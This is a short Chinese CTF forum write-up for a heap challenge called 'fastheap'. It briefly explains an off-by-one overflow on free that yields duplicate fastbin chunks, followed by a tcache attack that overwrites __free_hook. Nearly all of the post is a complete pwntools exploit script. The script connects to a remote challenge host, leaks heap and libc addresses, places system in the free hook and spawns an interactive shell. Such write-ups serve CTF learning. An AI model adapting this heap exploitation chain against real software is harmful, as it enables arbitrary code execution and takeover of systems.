-
-
[原创] 第九题:绝地逃生
-
2019-6-22 22:15 2411
-
1 free的时候存在低8位溢出.通过这个漏洞在fastbin里面加入重复chunk
2 tcache攻击,写freehook
from pwn import * #cn=process("./fastheap",shell=False) cn=remote("152.136.18.34",10000) base=0x555555554000 context.log_level='debug' def create(id,size,data): cn.sendlineafter(">>> ","1") cn.sendlineafter("ndex: ",str(id)) cn.sendlineafter("Size:",str(size)) cn.sendlineafter("ontents:",data) def show(id): cn.sendlineafter(">>> ", "3") cn.sendlineafter("ndex: ", str(id)) def delete(id1,id2,num): cn.sendlineafter(">>> ", "2") cn.sendlineafter("ndex range:",str(id1)+"-"+str(id2)) cn.sendlineafter("Number of workers:",str(num)) for i in range(255): if i == 3: create(i, 0x60, p64(0x71)*12) else: create(i,0x60,"s"*0x60) delete(251,255,7) create(255,0x60,"a"*0x60) create(254,0x60,"a"*0x60) create(253,0x60,"a"*0x60) create(252,0x60,"a"*0x60) create(251,0x60,"a"*0x60) delete(8,9,1) delete(0,1,1) show(255) heap_base=u64(cn.recv(6)+"\x00\x00")-0x5d0 heap_jump=heap_base+0x410 success(hex(heap_base)) delete(30,50,1) delete(6,7,1) delete(20,21,1) delete(253,254,1) for i in range(3): create(i+30,0x60,"s"*0x60) create(33,0x60,p64(heap_jump)*12) create(34,0x60,"s"*0x60) create(35,0x60,"s"*0x60) create(36,0x60,p64(0)+p64(0xe1)+"\n") delete(4,5,1) show(251) leak_addr=u64(cn.recv(6)+"\x00\x00") libc_baes=leak_addr-0x3ebca0 one_addr=libc_baes+0x4f2c5 jmp2_addr=leak_addr-0x8b-0x8 free_hook=libc_baes+0x3ed8e8 sys_addr=libc_baes+0x04f440 delete(5,6,1) delete(90,91,1) delete(252,253,1) create(37,0x60,p64(free_hook)*12) create(38,0x60,"s"*0x60) create(39,0x60,"s"*0x60) create(40,0x60,p64(sys_addr)+"\n") success(hex(free_hook)) #gdb.attach(cn,"set follow-fork-mode child\nb *"+hex(0x1109+base)+"\n b* "+hex(base+0xFC0)+"\n b *"+hex(base+0xEE0)) create(46,0x20,"/bin/sh\n") delete(46,47,1) cn.interactive()
[CTF入门培训]顶尖高校博士及硕士团队亲授《30小时教你玩转CTF》,视频+靶场+题目!助力进入CTF世界
赞赏
他的文章
看原图